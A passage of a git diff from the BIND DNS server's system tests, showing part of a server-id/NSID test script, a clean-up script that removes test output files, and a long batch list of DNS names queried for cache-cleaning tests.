@10.53.0.1 > dig.out.ns1.$n +grep "status: NOERROR" dig.out.ns1.$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns1.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +ret=0 +echo_i "Checking that server-id hostname works for query ($n)" +$DIG $DIGOPTS +short id.server txt ch @10.53.0.2 > dig.out.ns2.$n +grep "^\"$HOST_NAME\"$" dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +ret=0 +echo_i "Checking that server-id hostname works for EDNS name server ID request ($n)" +$DIG $DIGOPTS +norec +nsid foo @10.53.0.2 > dig.out.ns2.$n +grep "^; NSID: .* (\"$HOST_NAME\")$" dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +ret=0 +echo_i "Checking that custom server-id works for query ($n)" +$DIG $DIGOPTS +short id.server txt ch @10.53.0.3 > dig.out.ns3.$n +grep "^\"this.is.a.test.of.server-id\"$" dig.out.ns3.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +ret=0 +echo_i "Checking that custom server-id works for EDNS name server ID request ($n)" +$DIG $DIGOPTS +norec +nsid foo @10.53.0.3 > dig.out.ns3.$n +grep "^; NSID: .* (\"this.is.a.test.of.server-id\")$" dig.out.ns3.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/cacheclean/clean.sh b/bin/tests/system/cacheclean/clean.sh new file mode 100644 index 0000000..b346e65 --- /dev/null +++ b/bin/tests/system/cacheclean/clean.sh @@ -0,0 +1,27 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after cache cleaner tests. +# + +rm -f dig.out.ns2 +rm -f dig.out.expire +rm -f rndc.out.* +rm -f sed.out.* +rm -f */named.memstats +rm -f */named.run +rm -f */named.conf +rm -f ns2/named_dump.db.* +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/cacheclean/dig.batch b/bin/tests/system/cacheclean/dig.batch new file mode 100644 index 0000000..d185204 --- /dev/null +++ b/bin/tests/system/cacheclean/dig.batch @@ -0,0 +1,924 @@ +YA.AKAMAI.com. IN A +UPR1.UPR.CLU.EDU. IN A +integra.s-integra.co.JP. IN A +avalon.iks-jena.de. IN A +NS1.GLOBALDNS.com. IN A +NS.RDU.BELLSOUTH.net. IN A +ns.space.net. IN A +SUN.MHS-RELAY.AC.UK. IN A +AYAX.UNIANDES.EDU.CO. IN A +DNS.NIC.CD. IN A +NS.DNS.PT. IN A +NS1.INTERNETSHARE.com. IN A +MASTER.DNS.BE. IN A +CATAMOUNT.middlebury.EDU. IN A +FM03.FM. IN A +NAAMAK.NCST.ERNET.IN. IN A +gateway2.BFG.com. IN A +NS3.NS.ESAT.net. IN A +DNS1.INTUIT.com. IN A +DEN-NS2.FWIDCSERVICES.net. IN A +SOL.UNDPBI.TELEPAC.net. IN A +NS2.tridog.com. IN A +DNS2.KW. IN A +NS2.MAIL.com. IN A +NS.FIRSTCOM.CL. IN A +DNS4.QUICKEN.com. IN A +bofh.cid.net. IN A +NS1.KRNIC.net. IN A +NS2.SR.net. IN A +NS1.TELSTRA.net. IN A +ns.cafax.SE. IN A +NS1.DNS.NET.NZ. IN A +NS.CONCOURSE.com. IN A +35.32/27.110.16.12.IN-ADDR.ARPA. IN PTR +CCC.champcable.com. IN A +NS.RIPE.net. IN A +NS.NIC.NU. IN A +KIM.CAMNET.CM. IN A +DOGON.SOTELMA.net. IN A +DNS02.FLAME.org. IN A +NS.MIA.BELLSOUTH.net. IN A +mail.ok.RU. IN A +NS.NIC.MX. IN A +NS2.BERKELEY.EDU. IN A +SHIKHAR.MOS.COM.NP. IN A +noc.rrz.Uni-Koeln.de. IN A +NS.KORNET.net. IN A +keith.gazpacho.org. IN A +NS2.appliedtheory.com. IN A +NS.CERNET.net. IN A +smtp.ELISTX.com. IN A +NS-AIT.THNIC.net. IN A +from.PL. IN A +mailhub.icann.org. IN A +SEC1.DNS.UK.PSI.net. IN A +isrv3-i.isc.org. IN A +PHLOEM.UOREGON.EDU. IN A +CTINA.AR. IN A +DNS2.IAM.NET.MA. IN A +10.126.39.137.IN-ADDR.ARPA. IN PTR +DNS.PRINCETON.EDU. IN A +NS.BELLSOUTH.net. IN A +NS1.SNS-FELB.DEBIS.com. IN A +localhost. IN A +hm6.vt.highmeadow.com. IN A +SYRUP.hill.com. IN A +NS99.WAIKATO.AC.NZ. IN A +NS4.CW.net. IN A +NS2.SLOWMOE.com. IN A +ns2.hypa.net. IN A +ns.sxtyptt.NET.CN. IN A +NS2.MERCHANTWARE.com. IN A +uunymdgds1.DOUBLECLICK.net. IN A +e34.co.us.IBM.com. IN A +kista.dns.swip.net. IN A +ZEBRA.UEM.MZ. IN A +NET2.GENDYN.com. IN A +NS0.UTK.EDU. IN A +NS.RELCOM.EU.net. IN A +DNS0.AXION.BT.CO.UK. IN A +mail.vhv.com. IN A +DNS4.UK.MSFT.net. IN A +NS2.ADNS.net. IN A +NS1.SEATTLE.US.NETDNS.com. IN A +NS2.UNIVIE.AC.at. IN A +NS15B.BOCA15-VERIO.com. IN A +www.BAYAREA.com. IN CNAME +ns4.onemain.com. IN A +NS2.EDIGITALS.com. IN A +MICHAEL.VATICAN.VA. IN A +AUSTIN.GH.com. IN A +sld-ns2.CNNIC.NET.CN. IN A +NS2.CDC.GOV. IN A +NS.WATSON.IBM.com. IN A +NS.NIC.SH. IN A +NS2.BAHNHOF.net. IN A +NS-AUTH2.cmates.com. IN A +ISDMNL.WR.USGS.GOV. IN A +NS2.COBEX.net. IN A +MERLE.CIRA.CA. IN A +NS.UVG.EDU.GT. IN A +NS1.CWVA.DOUBLECLICK.net. IN A +eliot.diebold.com. IN A +NS.ALMADEN.IBM.com. IN A +NS2.INTERNETSQUARE.com. IN A +mail.QUEST-NET.com. IN A +Z1.NS.LHR1.GLOBIX.net. IN A +DNS1.AVANTEL.NET.MX. IN A +vh80040.vh8.INFI.net. IN A +NS.LEB.net. IN A +NS.DCC.UCHILE.CL. IN A +CLOUSO.RISQ.QC.CA. IN A +muenster.westfalen.de. IN A +us.a1.YIMG.com. IN CNAME +NS.DEMOS.SU. IN A +south.NAVPOINT.com. IN A +netconsult.netconx.de. IN A +DNS2.btinternet.com. IN A +NS2.CINE.net. IN A +castor.cmc.ec.gc.CA. IN A +EX2-DNS0.AVENUEA.com. IN A +firewall3.glaxowellcome.com. IN A +MACU.MA.MT.NP.ELS-GMS.att.net. IN A +NS.PA. IN A +TGSERV.TELE.GL. IN A +KYNSE02.MESSAGESECURE.com. IN A +GORGON.XTRA.CO.NZ. IN A +DNS.NIC.IT. IN A +pop.VERMONTEL.net. IN CNAME +NS2.REGISTRY.HM. IN A +NAMESERVER1.CONCENTRIC.net. IN A +47.131.127.204.IN-ADDR.ARPA. IN PTR +mailhost.tfm.com. IN A +NS1.MRC.GM. IN A +NS.WIDE.AD.JP. IN A +NS.BTA.NET.CN. IN A +NS2.ISPC.org. IN A +BOW.RAIN.FR. IN A +srs.srs.state.vt.us. IN A +NS4.WEB2010.com. IN A +NS.TELECOM.NET.ET. IN A +NS1.DNS.NET.KH. IN A +GATEN.JARING.MY. IN A +shell.nominum.com. IN A +CHEOPS.ANU.EDU.AU. IN A +VANGOGH.CS.BERKELEY.EDU. IN A +NS2.NOC.NULLUS.net. IN A +NIC.LTH.SE. IN A +ns.farm.net. IN A +NS.USEC.SUN.com. IN A +NS2.YOUR-DOMAIN.com. IN A +DNS-EAST.PREP.net. IN A +ns.hcr.net. IN A +NS-RCH.nortelnetworks.com. IN A +crl.DEC.com. IN A +NS.PIXAR.ES. IN A +MEX1-M-213.UNINET.NET.MX. IN A +NS.ITU.CH. IN A +matrix.uwm.EDU.PL. IN A +gateway1.gmcr.com. IN A +NS2.DNS.BR. IN A +foxharp.boston.MA.us. IN MX +Quest-7.symquest.com. IN A +NS2.VERIO.net. IN A +NAME.IAD.GBLX.net. IN A +NS2.EMIRATES.NET.AE. IN A +supai.oit.UMASS.EDU. IN A +QUERN.EPILOGUE.com. IN A +NS3.TOPICA.com. IN A +NS1.JERKY.net. IN A +JTB.BRUNET.BN. IN A +AUTH100.NS.UU.net. IN A +BOW.INTNET.DJ. IN A +OSI2.GUA.net. IN A +AZMODAN.ULA.VE. IN A +THUMPER.RPSLMC.EDU. IN A +ICHU.RCP.NET.PE. IN A +NS.NIC.AC. IN A +DNS.NETFLIGHT.com. IN A +ns2.UTORONTO.CA. IN A +mail.giffordmed.org. IN A +RATA.VUW.AC.NZ. IN A +NS-2.ADMONITOR.net. IN A +NCC.MOC.KW. IN A +NS.EUNET.ES. IN A +NS3.best.com. IN A +zip.MAIL-LIST.com. IN MX +JATZ.AARNET.EDU.AU. IN A +DNS2.MAN.LODZ.PL. IN A +NS.VERITAS.com. IN A +218.241.103.199.IN-ADDR.ARPA. IN PTR +BOW.SNPT.KM. IN A +Z1.NS.SJC1.GLOBIX.net. IN A +DNS.NIC.TT. IN A +MAKISIG.IPHIL.net. IN A +NS.DK.net. IN A +NS.NI. IN A +CIUP1.NCC.UP.PT. IN A +ns2.verisign-grs.com. IN A +NS1.UMASS.EDU. IN A +NS.NEWACCOUNT.net. IN A +UDNS2.ULTRADNS.net. IN A +NS2.LATNET.LV. IN A +info-server.surrey.AC.UK. IN A +NS2.SQUONK.net. IN A +NS2.DSO.net. IN A +www.energyenhancement.org. IN A +DNS1.BD. IN A +nl.COMPUWARE.com. IN MX +NS.DHIRAAGU.MV. IN A +TRANTOR.UMD.EDU. IN A +NS.ALCANET.NO. IN A +Z6.MSFT.AKADNS.com. IN A +NS4.ync.net. IN A +CMTU.MT.NS.ELS-GMS.att.net. IN A +vh40099.vh4.INFI.net. IN A +ns2.secondary.nl. IN A +abyssinian.sleepycat.com. IN A +APHEX.MENTOR.BE. IN A +webmail.fiberia.com. IN A +localhost.moonmothers.com. IN A +NS2.DNS.LU. IN A +NS.VISUALCOM.ES. IN A +TONIC.TO. IN A +NS1.CRSNIC.net. IN A +trurl.ispid.com.PL. IN A +datingagentur.de. IN A +NS2.NSIREGISTRY.net. IN A +ICE.VIA-NET-WORKS.IE. IN A +sgi1.map.com. IN A +NS0.HS0.U-NET.net. IN A +candle.pha.pa.us. IN A +NS1.PACIFIC.NET.SG. IN A +NS.CENIAI.NET.CU. IN A +NS2.UUCP.NE.JP. IN A +za.akamaitech.net. IN A +NS.UCR.AC.CR. IN A +DNS-02.NS.cs.com. IN A +dns2.primary.net. IN A +PAPPSRV.PAPP.UNDP.org. IN A +NS1.REGME.com. IN A +DNS.CS.KULEUVEN.AC.BE. IN A +NS1.VERMONTLAW.net. IN A +mail.garmontusa.com. IN A +NS2.SAIPAN.com. IN A +NS.ARICATRA.com. IN A +ns2.reedmedia.net. IN A +NS.NETLAB.SK. IN A +RELAY.GW.tislabs.com. IN A +b.ns.tmcs.net. IN A +NS1.IBL.BM. IN A +ok.RU. IN A +NS.RICC.ALMA-ATA.SU. IN A +KITKA.MARNET.MK. IN A +dasher.dartmouth.EDU. IN A +NS0.PLANET-THREE.com. IN A +KNOCK.SER.BBNPLANET.net. IN A +tornado.webtech.elk.PL. IN A +AUTH2.NS.IDT.net. IN A +host3.VTLEGALAID.org. IN A +NS.EUNET.SK. IN A +TULKU.NIC.AR. IN A +RELAY.CDNNET.CA. IN A +DNS2.TPSA.PL. IN A +enterprise.wirbel.com. IN A +ECNET.EC. IN A +ENGINE1.UNA.net. IN A +WYCU.WY.BR.NP.ELS-GMS.att.net. IN A +ARWENA.NASK.WAW.PL. IN A +PAC2.NIPR.MIL. IN A +DAISY.EE.UND.AC.ZA. IN A +odin.ietf.org. IN A +dns.kaben-net.de. IN A +NS2.ALTAVISTA.com. IN A +CASTOR.TELEGLOBE.net. IN A +CIR.RED.SV. IN A +PIJIN.COM.SB. IN A +NS4.CTCCOM.net. IN A +NS1.SOL.NO. IN A +DNS2.TK.MSFT.net. IN A +NS.BSDI.com. IN A +NS.SVIANED.nl. IN A +NS.NOVELL.com. IN A +NS.LUCKY.net. IN A +SJC-NS2.SJC.LYCOS.com. IN A +NS1.OP.net. IN A +worldnet.att.net. IN A +APIES.FRD.AC.ZA. IN A +mail.skiinsurance.com. IN A +NS.BELNET.BE. IN A +KOMO.INET.GA. IN A +EARTH.THEPLANET.net. IN A +VASCO.USMA.AC.PA. IN A +GODFEVER.DCCSERVER.com. IN A +BOS-NS2.BOS.LYCOS.com. IN A +NS2.GOTO.com. IN A +NS1.overstock.com. IN A +NS1-PUBLIC.ZMA.COMPAQ.com. IN A +ns.ilovedomain.com. IN A +ns1.anycast.net. IN A +PASCAL.UPRR.PR. IN A +NS3-AUTH.SPRINTLINK.net. IN A +NS1-Y.DNS.PIPEX.net. IN A +prue.eim.surrey.AC.UK. IN A +TROLL-GW.GATECH.EDU. IN A +NS.SIERRATEL.SL. IN A +ns2.PSHIFT.com. IN A +NS.ERS.IBM.com. IN A +ASLAN.OPEN-RSC.org. IN A +NS2.DOMAIN-REGISTRY.nl. IN A +uranus.lan-ks.de. IN A +mail.unlisys.net. IN A +NS.AUSTRIA.EU.net. IN A +AUTH01.CONNECT.IE. IN A +SUN.SCSI.GOV.BY. IN A +NS1.SIGMAHOSTING.com. IN A +NS.CAST.EDU.JM. IN A +DS.NIC.NET.SG. IN A +PRADES.CESCA.ES. IN A +ns.sta.NET.CN. IN A +NSE00.excite.com. IN A +NS3.ABOVE.net. IN A +CASBAH.ELDJAZAIR.NET.DZ. IN A +ASKIA.SOTELMA.ML. IN A +NS.IDT.net. IN A +FXCLPR02.IS.CHRYSLER.com. IN A +SVC00.APNIC.net. IN A +NS5.DCX.YAHOO.com. IN A +ns1.ray.net. IN A +NS.NIC.MC. IN A +ns.runway.CN.net. IN A +benoni.uit.NO. IN A +SCRATCHY.MINDSPRING.net. IN A +ns1.pcode.com. IN A +ns1.aha.RU. IN A +ns2.uwaterloo.CA. IN A +ns2.NIC.AD.JP. IN A +a.ns.foxharp.boston.MA.us. IN A +NS.NIC.IO. IN A +A-GTLD-SERVERS.dot-god.com. IN A +SMTP.slac.stanford.EDU. IN A +52.87.198.209.IN-ADDR.ARPA. IN PTR +BARNEY.ADVSYS.CO.UK. IN A +NS1.TELEPAC.PT. IN A +NICOSIA.CCS.UCY.AC.CY. IN A +NS.PUNCHDOWN.org. IN A +SYNAESTHESIA.COGNOSCENTI.org. IN A +NS2.PLANET-THREE.net. IN A +DNS.CIT.CORNELL.EDU. IN A +MODOR.VERISIGN.net. IN A +SUNSTROKE.IS.RPSLMC.EDU. IN A +NS2.SEG.net. IN A +NEMUNAS.SC-UNI.KTU.LT. IN A +MULGA.CS.MU.OZ.AU. IN A +NS1.NPLUS.GF. IN A +ns2.centralinfo.net. IN A +K.GTLD-SERVERS.net. IN A +ns1.codelocal.com. IN A +NS2.IPNS.com. IN A +NS0.DE.NIC.NU. IN A +NS.USSR.EU.net. IN A +NS.INTERNET.SK. IN A +CORREOS.SEKER.ES. IN A +mx1.buf.ADELPHIA.net. IN A +aun.UNINETT.NO. IN A +NS0.NETANET.com. IN A +www.MANY-PATHS-ENERGY-ENHANCEMENT.com. IN A +NS2.STARFIRE.DOUGLAS.MA.us. IN A +NS3.IKP.PL. IN A +pns.dtag.de. IN A +NZ.NS.NIC.NU. IN A +DAVER.bungi.com. IN A +gutenberg.bucksnet.com. IN A +DNS2.IT.net. IN A +NS2.SNS-UT.DEBIS.com. IN A +ISI.EDU. IN A +amethyst.xaos.org. IN A +PAPPILLOMA.WWEBSVS.com. IN A +NS2.bock.com. IN A +NS2.OAR.net. IN A +MINION.NETPOLICY.com. IN A +Mail.catic1.com. IN A +NS4.DNS.space.net. IN A +b.gtld-servers.ORSC. IN A +bend.madriver.com. IN A +NS4.IS-FUN.net. IN A +NS2.JPS.net. IN A +NS1.IP-PLUS.net. IN A +rush.cc1.RPSLMC.EDU. IN A +NS2.GBMTECH.net. IN A +DNS.MSEN.com. IN A +DNSSEC2.SINGNET.COM.SG. IN A +NS2.HOME.net. IN A +ACCESS.MBNET.MB.CA. IN A +DNS0.SPIN.AD.JP. IN A +Filer.PHOTOTRUST.com. IN A +jpl.NASA.GOV. IN A +NS2.TECHNOLOGIA.net. IN A +bparker.CONNACTIVITY.com. IN A +NS1.uvm.EDU. IN A +NS.SENET.net. IN A +DNS2.UTCC.UTORONTO.CA. IN A +localhost.costorf.com. IN A +DNS2.AD. IN A +HYDRA.HELSINKI.FI. IN A +NAME.PHX.GBLX.net. IN A +NS2.FOOL.com. IN A +NS01-SERVER.CURINFO.AN. IN A +NS.CR. IN A +mail.pshift.net. IN A +NS.IRD.FR. IN A +NS.UZ. IN A +DNS.INTELCOM.SM. IN A +DNS2.UNIV-NKC.MR. IN A +HNS3.hns.com. IN A +bay.cs.UTORONTO.CA. IN A +NS0.BT.net. IN A +BAYONET.SJMERCURY.com. IN A +PAN.BIJT.net. IN A +NAVI.SUBTEND.net. IN A +NS.CIX.CX. IN A +waldorf.Informatik.Uni-Dortmund.de. IN A +NS2.ivillage.com. IN A +DNS.NIC.XLINK.net. IN A +NS1.MERCHANTWARE.CON. IN A +NS.TO.GD-ES.com. IN A +NS-A.RNC.RO. IN A +REGGAE.NCREN.net. IN A +SSS-NL.DENIC.de. IN A +NS1.TDC.TO. IN A +NS.NIC.HU. IN A +JOANNA.WILLIAM.org. IN A +NS0.IIJ.AD.JP. IN A +maus.spack.org. IN A +B.NS.VERIO.net. IN A +SECDNS.EUNET.BE. IN A +NS3.EUROPE.YAHOO.com. IN A +A.ROOT-SERVERS.net. IN A +sherickpm.com. IN MX +NS2.MEDIASERVICES.net. IN A +YARDBIRD.CNS.vt.EDU. IN A +SUNIC.SUNET.SE. IN A +NS.MT. IN A +CNDVG001.usa.net. IN A +NS1.CX.ESCROW.IOCOMM.NET.CX. IN A +DNS-02.NS.AOL.com. IN A +ns2.tesserae.com. IN A +SV10.BATELCO.COM.BH. IN A +dec.anr.state.vt.us. IN MX +3.133.188.192.IN-ADDR.ARPA. IN PTR +NS1.LONDON.UK.NETDNS.com. IN A +NS.NIC.MG. IN A +DNS1.VN. IN A +DENS20.DEN.nps.GOV. IN A +z.ip6.INT. IN A +NS3.TRIVALLEY.com. IN A +isis.imag.FR. IN A +NS.SOVAM.com. IN A +NS-SOA.DARENET.DK. IN A +NS4.NIC.TV. IN A +DNSSRV1X.mitre.org. IN A +GATEKEEPER.NYTIMES.com. IN A +D.I-DNS.net. IN A +NS.KOLO.net. IN A +NS4.FIRSTWORLD.net. IN A +DECST.CERIST.DZ. IN A +NS4.DNS.WS. IN A +NS0.GDGSC.com. IN A +UCTHPX.UCT.AC.ZA. IN A +NS2.HOTWIRED.com. IN A +ns02.ca.us.ibm.net. IN A +NS2.SPEAKEASY.net. IN A +TELCOM.ZPTC.CO.ZW. IN A +NS.DK-HOSTMASTER.DK. IN A +NS.NIC.LK. IN A +NS2.zama.net. IN A +CZ.EUNET.CZ. IN A +NS.AC.ID. IN A +NS1.CUBE.de. IN A +NS1.QUASAR.net. IN A +NS1.OFFSHORE.AI. IN A +NS5.NRSITE.com. IN A +NS.AIC.net. IN A +OWL.NCC.nps.GOV. IN A +MAXIM.gbch.net. IN A +BOW.INTNET.TD. IN A +ns1.cacheware.com. IN A +NS2.SPEEDHOST.com. IN A +NS1.COMMIT.GM. IN A +NAME.ROC.GBLX.net. IN A +90.198.245.204.IN-ADDR.ARPA. IN PTR +BOLOGNA.NETTUNO.IT. IN A +NIC.IBD.com. IN A +NS.WESTOL.com. IN A +time.SOVER.net. IN CNAME +UNIX1.CS.UMASS.EDU. IN A +AARDVARK.WR.UMIST.AC.UK. IN A +NS1.NIC.YU. IN A +mail.velco.com. IN A +DNSAUTH2.SYS.GTEI.net. IN A +NS.TELE.FI. IN A +state.vt.us. IN MX +NS.NYC.juno.com. IN A +NS1.g-world.com. IN A +AUTH2.AMERICA.net. IN A +KIRA.ECS.UMASS.EDU. IN A +CONACYT.GOB.SV. IN A +DNS.SRCE.HR. IN A +NS00.ns0.com. IN A +NS2.CL.BELLSOUTH.net. IN A +jenner.med.HARVARD.EDU. IN A +p2.cavebear.com. IN A +NS1.NIC.JE. IN A +ORCU.OR.BR.NP.ELS-GMS.att.net. IN A +NS.XBILL.org. IN A +WRAITH.CS.UOW.EDU.AU. IN A +12.159.145.204.IN-ADDR.ARPA. IN PTR +ns1.pr.SUN.com. IN A +NS.SPIN.OMNES.net. IN A +smtp.188.net. IN A +TERMINAL.2GLOBE.net. IN A +NS2.HARVARD.EDU. IN A +NAMESERVER.CNR.IT. IN A +EARTH.SY. IN A +DNS2.REACCIUN.VE. IN A +NS.TMX.COM.NI. IN A +freefour.acs.rpi.EDU. IN A +242.84.198.209.IN-ADDR.ARPA. IN PTR +CORREU.STA.AD. IN A +NS.DRUKNET.NET.BT. IN A +NS4.US.PRSERV.net. IN A +KAASASSUK.GH.GL. IN A +ECUA.NET.EC. IN A +NS.CONCYT.GOB.GT. IN A +NS2.NAP.net. IN A +DNS2.CN.net. IN A +MX.NSI.NASA.GOV. IN A +NS.TDS.net. IN A +tdns-me1.NETSCAPE.com. IN A +NS2.METU.EDU.TR. IN A +NS2.SETARNET.AW. IN A +87.184.152.204.IN-ADDR.ARPA. IN PTR +DNS.OMNIWAY.SM. IN A +NS0.U-NET.net. IN A +elektro.CMHNET.org. IN A +ns2.HIGGS.net. IN A +NS2.SKYNETWEB.com. IN A +MAGIC.MN. IN A +NS1.YAHOO.com. IN A +mx1.cdp.ADELPHIA.net. IN A +SANTO.VANUATU.COM.VU. IN A +www.mmuuf.org. IN MX +ns1.timeheart.net. IN A +NS2.TOGETHER.net. IN A +NS.AMNIC.net. IN A +NS.EENET.EE. IN A +www.ONLINEPHOTOCONTEST.com. IN A +VIC20.BLIPP.com. IN A +DNS.FROGHOUSE.org. IN A +NS2.ELI.net. IN A +NS.CAIS.com. IN A +BAABEN.AFRIQ.net. IN A +NS2.NJ.EXODUS.net. IN A +DOMREG.NIC.CH. IN A +NS.EU.net. IN A +NS1.DIEBOLD.net. IN A +NS3.CP.net. IN A +DNS.FUW.EDU.PL. IN A +www.retro.com. IN A +NS2.UNI2.net. IN A +ns1.alcatrazmedia.com. IN A +dns6.CP.MSFT.net. IN A +NS1.SEYCHELLES.net. IN A +NS2.INTERNIC.net. IN A +front.macrosoft.WAW.PL. IN A +NISC.JVNC.net. IN A +AUTH03.NS.DE.UU.net. IN A +BURDELL.CC.GATECH.EDU. IN A +NS4.AH.net. IN A +ns1.sgh-net.de. IN A +Leland2.stanford.EDU. IN A +CBRU.BR.NS.ELS-GMS.att.net. IN A +DENEB.DOMAINNT.net. IN A +ns1.ivm.net. IN A +NS0.CWCI.net. IN A +35.110.16.12.IN-ADDR.ARPA. IN CNAME +f.trns. IN A +ODISEJ.TELEKOM.YU. IN A +FRCU.EUN.EG. IN A +NS.HHS.net. IN A +FOO.GRNET.GR. IN A +mail.WonderWorks.com. IN A +NS1.IAFRICA.com. IN A +NS.KACST.EDU.SA. IN A +srs.state.vt.us. IN A +OM4.OMANTEL.NET.OM. IN A +Yeshua.Christ.com. IN A +NS1.SIMORGH.com. IN A +OLKETA.SOLOMON.COM.SB. IN A +BANBA.DOMAINREGISTRY.IE. IN A +NOC.IOS.com. IN A +ns.schnism.net. IN A +e4.ny.us.IBM.com. IN A +DNS2.SEANET.com. IN A +doubt.dd.org. IN A +AMBER.ELEKTRON.PL. IN A +gw.rge.com. IN A +NS2.ZTNET.com. IN A +NS3.INFI.net. IN A +ZA.AKADNS.net. IN A +ESTIA.CSI.FORTH.GR. IN A +vtagr04.agr.state.vt.us. IN A +NS1-PUBLIC.ZTX.COMPAQ.com. IN A +ADMII.ARL.MIL. IN A +NS.NIXU.FI. IN A +DNS2.PIONEERNET.net. IN A +NS.NIC.CL. IN A +NS2.UTZ. IN A +NS4.LUXNOC.com. IN A +NS2.PBI.net. IN A +annwfn.erfurt.thur.de. IN A +NS1.MW.mediaone.net. IN A +NS1.ISU.NET.SA. IN A +pop.SHOREHAM.net. IN CNAME +DNS2.GUERNSEY.net. IN A +NS1.BEACHSHORE.net. IN A +HKUXB.HKU.HK. IN A +NS.DOLEH.com. IN A +NS.hactrn.net. IN A +MALAKULA.BONDY.IRD.FR. IN A +NS1.mediaone.net. IN A +NS2.GPG.com. IN A +noc.BelWue.de. IN A +NS2.GIP.net. IN A +RS.ISLES.net. IN A +BOW.INTNET.GQ. IN A +A.OPEN.BY. IN A +us.i1.YIMG.com. IN CNAME +athome.wetlogic.net. IN CNAME +NS1.NIST.GOV. IN A +mail.jerusalem-mail.com. IN A +ISDSUN.cr.USGS.GOV. IN A +NS.BOSTON.juno.com. IN A +NS2.CADABRA.com. IN A +nps.GOV. IN MX +RELAY.HUJI.AC.IL. IN A +styx.tahina.priv.at. IN A +ISGATE.IS. IN A +ns0.lux.dot-eu.org. IN A +BILBO.NASK.ORG.PL. IN A +MAIL.TARSUS.com. IN A +SUN.REDIRIS.ES. IN A +NS2.NEASE.net. IN A +OHCU.OH.MT.NP.ELS-GMS.att.net. IN A +NS2.NF. IN A +MIRAF-SERVER3.HONDUTEL.HN. IN A +ns3.worldnet.att.net. IN A +NS2.NETNAMES.net. IN A +ITGBOX.IAT.CNR.IT. IN A +NS2.ADELPHIA.net. IN A +NS2.RIPN.net. IN A +NS1.cinenet.net. IN A +jengate.thur.de. IN A +NOC.ULCC.JA.net. IN A +NS.NOC.UZ. IN A +NS0.JA.net. IN A +NS2.INR.net. IN A +netsage.org. IN A +TERI.USP.AC.FJ. IN A +NS2.NETSOL.com. IN A +NS2.ABAC.com. IN A +NS2.NIC.FR. IN A +KANIN.ARNES.SI. IN A +NS.EDU.GU. IN A +DNS.INRIA.FR. IN A +HEDNS1.GOOGLE.com. IN A +asylum.sf.ca.us. IN A +ACT2.ACT2000.net. IN A +ICM1.ICP.net. IN A +202.192.103.198.209.IN-ADDR.ARPA. IN PTR +ECSEL.jhuapl.EDU. IN A +NS2.DCNY.DOUBLECLICK.net. IN A +keith.netsage.org. IN A +MANTA.OUTREMER.com. IN A +NS2.globalnetisp.net. IN A +NS2.CCSRS.net. IN A +NS1.NL.CONCENTRIC.com. IN A +NS2.VI.net. IN A +NS2.NEO.net. IN A +cgi.MERCURYCENTER.com. IN CNAME +ORSTOM.RIO.net. IN A +NS2.CONRADPROMOTIONS.com. IN A +YARRINA.CONNECT.COM.AU. IN A +dns03.OPS.usa.net. IN A +APPSRV.HAITIWORLD.com. IN A +NS.RELCOM.KZ. IN A +NS1.MAGIC-MOMENTS.com. IN A +NS.ALCATEL.com. IN A +ns2.terra.net. IN A +NS3.hotmail.com. IN A +vtc.VSC.EDU. IN MX +www.vmba.org. IN MX +NAHOURI.ONATEL.BF. IN A +SERVER2.INFN.IT. IN A +NS2.AI-R.com. IN A +NS1.FREE.net. IN A +vcmr-54.server.rpi.EDU. IN A +haig.CS.UCL.AC.UK. IN A +mail.nova-data.com. IN A +MOEVAX.EDU.TW. IN A +NS2.LTWCC.org. IN A +NS.BA. IN A +noc.HRZ.uni-bielefeld.de. IN A +VANILLA.WRO.nps.GOV. IN A +NS2.SZTAKI.HU. IN A +SECIU.EDU.UY. IN A +COL2.CARIBSURF.com. IN A +NS2.QATAR.NET.QA. IN A +NS2.E-SYNC.net. IN A +ns1.eu.SUN.com. IN A +NS1.UUSJ.DOUBLECLICK.net. IN A +NS2.CUHK.EDU.HK. IN A +NS1.MEITCA.com. IN A +NS2.DSL.net. IN A +techfac.techfak.uni-bielefeld.de. IN A +listserv.performancediver.com. IN A +foolusmf.D4P.net. IN CNAME +pedic-med.vrx.net. IN A +GRUMPY.NET.NA. IN A +BK.tifosi.com. IN A +ns3.PAIR.com. IN A +ns2.ar.com. IN A +MASSIRA.ONPT.NET.MA. IN A +NS.KBFI.EE. IN A +ns3.Algebra.com. IN A +faerber.muc.de. IN MX +9.206.203.192.IN-ADDR.ARPA. IN PTR +PUKU.UNZA.ZM. IN A +ATLNET.ATLONLINE.com. IN A +Z1.NS.NYC1.GLOBIX.net. IN A +www.hometownbands.com. IN A +SIMON.CS.CORNELL.EDU. IN A +EKEKO.RCPIP.net. IN A +emerald.itnet.com.PL. IN A +DNS1.ICS.FORTH.GR. IN A +NS.ATL.BELLSOUTH.net. IN A +ntp.ctr.COLUMBIA.EDU. IN CNAME +NS2.GLOBECOMM.net. IN A +UUNS1DNS1.FLONETWORK.com. IN A +GRIN.GNOSH.net. IN A +NS.DIGSYS.BG. IN A +uunet.UU.net. IN MX +ns1.vermontel.com. IN A +NS2.GREENMOUNTAINACCESS.net. IN A +38.241.5.198.IN-ADDR.ARPA. IN PTR +NS1.NIC.UK. IN A +DNS.FCCN.PT. IN A +NS2.NIC.TJ. IN A +NS4.NEWACCOUNT.com. IN A +NS2.IHUG.NET.NZ. IN A +NS.SIGNALZ.com. IN A +DNS.NIC.AD. IN A +3.2.39.137.IN-ADDR.ARPA. IN PTR +UUCP-GW-2.PA.DEC.com. IN A +NS.LANDLORDS.com. 